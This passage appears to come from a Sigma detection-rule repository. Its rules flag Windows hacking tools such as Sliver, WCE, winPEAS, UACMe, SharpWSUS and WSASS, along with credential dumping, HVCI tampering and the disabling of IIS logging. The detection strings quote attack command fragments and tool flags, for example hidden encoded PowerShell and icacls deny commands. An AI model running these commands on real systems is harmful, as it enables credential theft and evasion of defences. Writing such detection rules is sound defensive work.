- 'Invoke-MapDomainTrust'\n              - 'Invoke-RevertToSelf'\n              - 'Invoke-Sharefinder'\n              - 'Invoke-UserImpersonation'\n              # - 'New-DomainGroup'\n              # - 'New-DomainUser'\n              - 'Remove-DomainObjectAcl'\n              - 'Remove-RemoteConnection'\n              - 'Request-SPNTicket'\n              # - 'Resolve-IPAddress'\n              # - 'Set-ADObject'\n              - 'Set-DomainObject'\n              # - 'Set-DomainUserPassword'\n              - 'Test-AdminAccess'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sharpwsus_wsuspendu_execution.yml",
    "content": "title: HackTool - SharpWSUS/WSUSpendu Execution\nid: b0ce780f-10bd-496d-9067-066d23dc3aa5\nstatus: test\ndescription: |\n    Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS.\n    Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.\nreferences:\n    - https://labs.nettitude.com/blog/introducing-sharpwsus/\n    - https://github.com/nettitude/SharpWSUS\n    - https://web.archive.org/web/20210512154016/https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1\nauthor: '@Kostastsale, Nasreddine Bencherchali (Nextron Systems)'\ndate: 2022-10-07\nmodified: 2024-08-23\ntags:\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1210\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_wsuspendu_inject:\n        CommandLine|contains: ' -Inject '\n    selection_wsuspendu_payload:\n        CommandLine|contains:\n            - ' -PayloadArgs '\n            - ' -PayloadFile '\n    selection_sharpwsus_commands:\n        CommandLine|contains:\n            - ' approve '\n            - ' create '\n            - ' check '\n            - ' delete '\n    selection_sharpwsus_flags:\n        CommandLine|contains:\n            - ' /payload:'\n            - ' /payload='\n            - ' /updateid:'\n            - ' /updateid='\n    condition: all of selection_wsuspendu_* or all of selection_sharpwsus_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_silenttrinity_stager.yml",
    "content": "title: HackTool - SILENTTRINITY Stager Execution\nid: 03552375-cc2c-4883-bbe4-7958d5a980be\nrelated:\n    - id: 75c505b1-711d-4f68-a357-8c3fe37dbf2d # DLL Load\n      type: derived\nstatus: test\ndescription: Detects SILENTTRINITY stager use via PE metadata\nreferences:\n    - https://github.com/byt3bl33d3r/SILENTTRINITY\nauthor: Aleksey Potapov, oscd.community\ndate: 2019-10-22\nmodified: 2023-02-13\ntags:\n    - attack.command-and-control\n    - attack.t1071\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Description|contains: 'st2stager'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml",
    "content": "title: HackTool - Sliver C2 Implant Activity Pattern\nid: 42333b2c-b425-441c-b70e-99404a17170f\nstatus: test\ndescription: Detects process activity patterns as seen being used by Sliver C2 framework implants\nreferences:\n    - https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36\n    - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/\nauthor: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2022-08-25\nmodified: 2023-03-05\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: '-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_soaphound_execution.yml",
    "content": "title: HackTool - SOAPHound Execution\nid: e92a4287-e072-4a40-9739-370c106bb750\nstatus: test\ndescription: |\n    Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.\nreferences:\n    - https://github.com/FalconForceTeam/SOAPHound\n    - https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c\nauthor: '@kostastsale'\ndate: 2024-01-26\ntags:\n    - attack.discovery\n    - attack.t1087\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_1:\n        CommandLine|contains:\n            - ' --buildcache '\n            - ' --bhdump '\n            - ' --certdump '\n            - ' --dnsdump '\n    selection_2:\n        CommandLine|contains:\n            - ' -c '\n            - ' --cachefilename '\n            - ' -o '\n            - ' --outputdirectory'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_stracciatella_execution.yml",
    "content": "title: HackTool - Stracciatella Execution\nid: 7a4d9232-92fc-404d-8ce1-4c92e7caf539\nstatus: test\ndescription: Detects Stracciatella, a tool that executes a PowerShell runspace from within C# (aka the SharpPick technique) with AMSI, ETW and Script Block Logging disabled, based on PE metadata characteristics.\nreferences:\n    - https://github.com/mgeeky/Stracciatella\nauthor: pH-T (Nextron Systems)\ndate: 2023-04-17\nmodified: 2024-11-23\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1059\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\Stracciatella.exe'\n        - OriginalFileName: 'Stracciatella.exe'\n        - Description: 'Stracciatella'\n        - Hashes|contains:\n              - 'SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956'\n              - 'SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sysmoneop.yml",
    "content": "title: HackTool - SysmonEOP Execution\nid: 8a7e90c5-fe6e-45dc-889e-057fe4378bd9\nstatus: test\ndescription: Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120\nreferences:\n    - https://github.com/Wh04m1001/SysmonEoP\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-12-04\nmodified: 2024-11-23\ntags:\n    - cve.2022-41120\n    - attack.t1068\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\SysmonEOP.exe'\n    selection_hash:\n        Hashes|contains:\n            - 'IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5'\n            - 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_trufflesnout.yml",
    "content": "title: HackTool - TruffleSnout Execution\nid: 69ca006d-b9a9-47f5-80ff-ecd4d25d481a\nstatus: test\ndescription: Detects the use of TruffleSnout.exe, an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low-noise enumeration.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md\n    - https://github.com/dsnezhkov/TruffleSnout\n    - https://github.com/dsnezhkov/TruffleSnout/blob/7c2f22e246ef704bc96c396f66fa854e9ca742b9/TruffleSnout/Docs/USAGE.md\nauthor: frack113\ndate: 2022-08-20\nmodified: 2023-02-13\ntags:\n    - attack.discovery\n    - attack.t1482\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName: 'TruffleSnout.exe'\n        - Image|endswith: '\\TruffleSnout.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_uacme.yml",
    "content": "title: HackTool - UACMe Akagi Execution\nid: d38d2fa4-98e6-4a24-aff1-410b0c9ad177\nstatus: test\ndescription: Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2021-08-30\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_pe:\n        - Product: 'UACMe'\n        - Company:\n              - 'REvol Corp'\n              - 'APT 92'\n              - 'UG North'\n              - 'Hazardous Environments'\n              - 'CD Project Rekt'\n        - Description:\n              - 'UACMe main module'\n              - 'Pentesting utility'\n        - OriginalFileName:\n              - 'Akagi.exe'\n              - 'Akagi64.exe'\n    selection_img:\n        Image|endswith:\n            - '\\Akagi64.exe'\n            - '\\Akagi.exe'\n    selection_hashes_sysmon:\n        Hashes|contains:\n            - 'IMPHASH=767637C23BB42CD5D7397CF58B0BE688'\n            - 'IMPHASH=14C4E4C72BA075E9069EE67F39188AD8'\n            - 'IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC'\n            - 'IMPHASH=7D010C6BB6A3726F327F7E239166D127'\n            - 'IMPHASH=89159BA4DD04E4CE5559F132A9964EB3'\n            - 'IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F'\n            - 'IMPHASH=5834ED4291BDEB928270428EBBAF7604'\n            - 'IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38'\n            - 'IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894'\n            - 'IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74'\n            - 'IMPHASH=3DE09703C8E79ED2CA3F01074719906B'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_wce.yml",
    "content": "title: HackTool - Windows Credential Editor (WCE) Execution\nid: 7aa7009a-28b9-4344-8c1f-159489a390df\nstatus: test\ndescription: |\n    Detects the use of Windows Credential Editor (WCE), a popular post-exploitation tool used to extract plaintext passwords, hash, PIN code and Kerberos tickets from memory.\n    It is often used by threat actors for credential dumping and lateral movement within compromised networks.\nreferences:\n    - https://www.ampliasecurity.com/research/windows-credentials-editor/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-12-31\nmodified: 2025-10-21\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\WCE.exe'\n            - '\\WCE64.exe'\n    selection_hash:\n        Hashes|contains:\n            - 'IMPHASH=136F0A8572C058A96436C82E541E4C41'\n            - 'IMPHASH=589657C64DDE88533186C39F82FA1F50'\n            - 'IMPHASH=6BFE09EFCB4FFDE061EBDBAFC4DB84CF'\n            - 'IMPHASH=7D490037BF450877E6D0287BDCFF8D2E'\n            - 'IMPHASH=8AB93B061287C79F3088C5BC7E7D97ED'\n            - 'IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F'\n            - 'IMPHASH=BA434A7A729EEC20E136CA4C32D6C740'\n            - 'IMPHASH=BD1D1547DA13C0FCB6C15E86217D5EB8'\n            - 'IMPHASH=E96A73C7BF33A464C510EDE582318BF2'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_winpeas.yml",
    "content": "title: HackTool - winPEAS Execution\nid: 98b53e78-ebaf-46f8-be06-421aafd176d9\nstatus: test\ndescription: WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz\nreferences:\n    - https://github.com/carlospolop/PEASS-ng\n    - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation\nauthor: Georg Lauenstein (sure[secure])\ndate: 2022-09-19\nmodified: 2023-03-23\ntags:\n    - attack.privilege-escalation\n    - attack.discovery\n    - attack.t1082\n    - attack.t1087\n    - attack.t1046\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'winPEAS.exe'\n        - Image|endswith:\n              - '\\winPEASany_ofs.exe'\n              - '\\winPEASany.exe'\n              - '\\winPEASx64_ofs.exe'\n              - '\\winPEASx64.exe'\n              - '\\winPEASx86_ofs.exe'\n              - '\\winPEASx86.exe'\n    selection_cli_option:\n        CommandLine|contains:\n            - ' applicationsinfo' # Search installed applications information\n            - ' browserinfo' # Search browser information\n            - ' eventsinfo' # Display interesting events information\n            - ' fileanalysis' # Search specific files that can contain credentials and for regexes inside files\n            - ' filesinfo' # Search generic files that can contain credentials\n            - ' processinfo' # Search processes information\n            - ' servicesinfo' # Search services information\n            - ' windowscreds' # Search windows credentials\n    selection_cli_dl:\n        CommandLine|contains: 'https://github.com/carlospolop/PEASS-ng/releases/latest/download/'\n    selection_cli_specific:\n        - ParentCommandLine|endswith: ' -linpeas'\n        - CommandLine|endswith: ' -linpeas'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_winpwn.yml",
    "content": "title: HackTool - WinPwn Execution\nid: d557dc06-62e8-4468-a8e8-7984124908ce\nrelated:\n    - id: 851fd622-b675-4d26-b803-14bc7baa517a\n      type: similar\nstatus: test\ndescription: |\n    Detects commandline keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.\nauthor: Swachchhanda Shrawan Poudel\ndate: 2023-12-04\nreferences:\n    - https://github.com/S3cur3Th1sSh1t/WinPwn\n    - https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841\n    - https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/\n    - https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md\n    - https://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.discovery\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1046\n    - attack.t1082\n    - attack.t1106\n    - attack.t1518\n    - attack.t1548.002\n    - attack.t1552.001\n    - attack.t1555\n    - attack.t1555.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'Offline_Winpwn'\n            - 'WinPwn '\n            - 'WinPwn.exe'\n            - 'WinPwn.ps1'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml",
    "content": "title: HackTool - Wmiexec Default Powershell Command\nid: 022eaba8-f0bf-4dd9-9217-4604b0bb3bb0\nstatus: test\ndescription: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script\nreferences:\n    - https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-08\ntags:\n    - attack.defense-evasion\n    - attack.lateral-movement\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: '-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_wsass.yml",
    "content": "title: HackTool - WSASS Execution\nid: 589ac73f-8e12-409c-964e-31a2f5775ae2\nstatus: experimental\ndescription: |\n    Detects execution of WSASS, a tool used to dump LSASS memory on Windows systems by leveraging WER's\n    (Windows Error Reporting) WerFaultSecure.EXE to bypass PPL (Protected Process Light) protections.\nreferences:\n    - https://github.com/TwoSevenOneT/WSASS\n    - https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-23\nmodified: 2026-01-09\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\wsass.exe'\n    selection_hash:\n        Hashes|contains: 'IMPHASH=32F5095C9BBDCACF28FD4060EB4DFC42'\n    selection_cli:\n        # change to |re|i after Sigma v2.0 release\n        # plain string without quotation marks as it has to match for both ' and \"\n        CommandLine|re: (?i)\\.exe[\\\"\\']?\\s+[^\\\"]{0,64}werfaultsecure\\.exe[\\\"\\']?\\s+\\d{2,10} # wsass.exe \"path to werfaultsecure\" lsass_pid\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_hktl_wsass/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_xordump.yml",
    "content": "title: HackTool - XORDump Execution\nid: 66e563f9-1cbd-4a22-a957-d8b7c0f44372\nstatus: test\ndescription: Detects suspicious use of XORDump process memory dumping utility\nreferences:\n    - https://github.com/audibleblink/xordump\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-28\nmodified: 2023-02-08\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1003.001\n    - attack.credential-access\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\xordump.exe'\n        - CommandLine|contains:\n              - ' -process lsass.exe '\n              - ' -m comsvcs '\n              - ' -m dbghelp '\n              - ' -m dbgcore '\n    condition: selection\nfalsepositives:\n    - Another tool that uses the command line switches of XORdump\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_zipexec.yml",
    "content": "title: Suspicious ZipExec Execution\nid: 90dcf730-1b71-4ae7-9ffc-6fcf62bd0132\nstatus: test\ndescription: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.\nreferences:\n    - https://twitter.com/SBousseaden/status/1451237393017839616\n    - https://github.com/Tylous/ZipExec\nauthor: frack113\ndate: 2021-11-07\nmodified: 2022-12-25\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    run:\n        CommandLine|contains|all:\n            - '/generic:Microsoft_Windows_Shell_ZipFolder:filename='\n            - '.zip'\n            - '/pass:'\n            - '/user:'\n    delete:\n        CommandLine|contains|all:\n            - '/delete'\n            - 'Microsoft_Windows_Shell_ZipFolder:filename='\n            - '.zip'\n    condition: run or delete\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hostname_execution.yml",
    "content": "title: Suspicious Execution of Hostname\nid: 7be5fb68-f9ef-476d-8b51-0256ebece19e\nstatus: test\ndescription: Use of hostname to get information\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/hostname\nauthor: frack113\ndate: 2022-01-01\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\HOSTNAME.EXE'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hvci_registry_tampering.yml",
    "content": "title: Hypervisor-protected Code Integrity (HVCI) Related Registry Tampering Via CommandLine\nid: 6225c53a-a96e-4235-b28f-8d7997cd96eb\nrelated:\n    - id: 8b7273a4-ba5d-4d8a-b04f-11f2900d043a\n      type: similar\nstatus: experimental\ndescription: |\n    Detects tampering with Hypervisor-protected Code Integrity (HVCI) related registry values via the command line tool reg.exe.\n    HVCI uses virtualization-based security to protect code integrity by ensuring that only trusted code can run in kernel mode.\n    Adversaries may tamper with HVCI to load malicious or unsigned drivers, which can be used to escalate privileges, maintain persistence, or evade security mechanisms.\nreferences:\n    - https://www.sophos.com/en-us/blog/sharpening-the-knife-gold-blades-strategic-evolution\n    - https://learn.microsoft.com/en-us/windows/security/hardware-security/enable-virtualization-based-protection-of-code-integrity\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-01-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\reg.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'reg.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'add '\n            - 'New-ItemProperty '\n            - 'Set-ItemProperty '\n            - 'si '  # SetItem Alias\n    selection_cli_base:\n        CommandLine|contains: '\\DeviceGuard'\n    selection_cli_key:\n        CommandLine|contains:\n            - 'EnableVirtualizationBasedSecurity'\n            - 'HypervisorEnforcedCodeIntegrity'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate system administration tasks that require disabling HVCI for troubleshooting purposes when certain drivers or applications are incompatible with it.\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_hvci_registry_tampering/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Disable Hypervisor-Enforced Code Integrity (HVCI)\n      technique: T1562.001\n      atomic_guid: 70bd71e6-eba4-4e00-92f7-617911dbe020\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hwp_exploits.yml",
    "content": "title: Suspicious HWP Sub Processes\nid: 023394c4-29d5-46ab-92b8-6a534c6f447b\nstatus: test\ndescription: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate exploitation\nreferences:\n    - https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/\n    - https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1\n    - https://twitter.com/cyberwar_15/status/1187287262054076416\n    - https://blog.alyac.co.kr/1901\n    - https://en.wikipedia.org/wiki/Hangul_(word_processor)\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-10-24\nmodified: 2021-11-27\ntags:\n    - attack.initial-access\n    - attack.t1566.001\n    - attack.execution\n    - attack.t1203\n    - attack.t1059.003\n    - attack.g0032\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\Hwp.exe'\n        Image|endswith: '\\gbb.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hxtsr_masquerading.yml",
    "content": "title: Potential Fake Instance Of Hxtsr.EXE Executed\nid: 4e762605-34a8-406d-b72e-c1a089313320\nstatus: test\ndescription: |\n    HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.\n    HxTsr.exe is part of the Outlook apps and resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\n    Any instance of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe.\nreferences:\n    - Internal Research\nauthor: Sreeman\ndate: 2020-04-17\nmodified: 2024-02-08\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    # TODO: Link this to the more generic system process rule\n    selection:\n        Image|endswith: '\\hxtsr.exe'\n    filter_main_hxtsr:\n        Image|contains: ':\\program files\\windowsapps\\microsoft.windowscommunicationsapps_'\n        Image|endswith: '\\hxtsr.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_icacls_deny.yml",
    "content": "title: Use Icacls to Hide File to Everyone\nid: 4ae81040-fc1c-4249-bfa3-938d260214d9\nstatus: test\ndescription: Detects use of icacls to deny access for everyone in the Users folder, which is sometimes used to hide malicious files\nreferences:\n    - https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/\nauthor: frack113\ndate: 2022-07-18\nmodified: 2024-04-29\ntags:\n    - attack.defense-evasion\n    - attack.t1564.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_icacls:\n        - OriginalFileName: 'iCACLS.EXE'\n        - Image|endswith: '\\icacls.exe'\n    selection_cmd: # icacls \"C:\\Users\\admin\\AppData\\Local\\37f92fe8-bcf0-4ee0-b8ba-561f797f5696\" /deny *S-1-1-0:(OI)(CI)(DE,DC)\n        CommandLine|contains|all:\n            - '/deny'\n            - '*S-1-1-0:'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ieexec_download.yml",
    "content": "title: File Download And Execution Via IEExec.EXE\nid: 9801abb8-e297-4dbf-9fbd-57dde0e830ad\nstatus: test\ndescription: Detects execution of the IEExec utility to download and execute files\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Ieexec/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-05-16\nmodified: 2023-11-09\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\IEExec.exe'\n        - OriginalFileName: 'IEExec.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'http://'\n            - 'https://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_iexpress_susp_execution.yml",
    "content": "title: Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location\nid: b2b048b0-7857-4380-b0fb-d3f0ab820b71\nstatus: test\ndescription: |\n    Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations.\n    This behavior has been observed in-the-wild by different threat actors.\nreferences:\n    - https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html\n    - https://en.wikipedia.org/wiki/IExpress\n    - https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/\n    - https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-05\nmodified: 2024-06-04\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # VT Query: behavior_processes:\"iexpress.exe\" and behavior_processes:\"/n /q /m\" and behavior_processes:\"*.sed*\" and p:5+\n    selection_img:\n        - Image|endswith: '\\iexpress.exe'\n        - OriginalFileName: 'IEXPRESS.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' /n '\n    selection_paths:\n        CommandLine|contains:\n            # Note: Add more uncommon paths that fit your organizational needs.\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Windows\\System32\\Tasks\\'\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Administrators building packages using iexpress.exe\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_iis_appcmd_http_logging.yml",
    "content": "title: Disable Windows IIS HTTP Logging\nid: e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e\nstatus: test\ndescription: Detects the disabling of HTTP logging on a Windows IIS web server via appcmd, as seen used by Threat Group 3390 (Bronze Union)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging\nauthor: frack113\ndate: 2022-01-09\nmodified: 2023-01-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\appcmd.exe'\n        - OriginalFileName: 'appcmd.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'set'\n            - 'config'\n            - 'section:httplogging'\n            - 'dontLog:true'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml",
    "content": "title: Microsoft IIS Service Account Password Dumped\nid: 2d3cdeec-c0db-45b4-aa86-082f7eb75701\nstatus: test\ndescription: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords\nreferences:\n    - https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html\n    - https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA\n    - https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/\nauthor: Tim Rauch, Janantha Marasinghe, Elastic (original idea)\ndate: 2022-11-08\nmodified: 2023-01-22\ntags:\n    - attack.credential-access\n    - attack.t1003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_base_name:\n        - Image|endswith: '\\appcmd.exe'\n        - OriginalFileName: 'appcmd.exe'\n    selection_base_list:\n        CommandLine|contains: 'list '\n    selection_standalone:\n        CommandLine|contains:\n            - ' /config' # https://pbs.twimg.com/media/FgydDAJWIAEio34?format=png&name=900x900\n            - ' 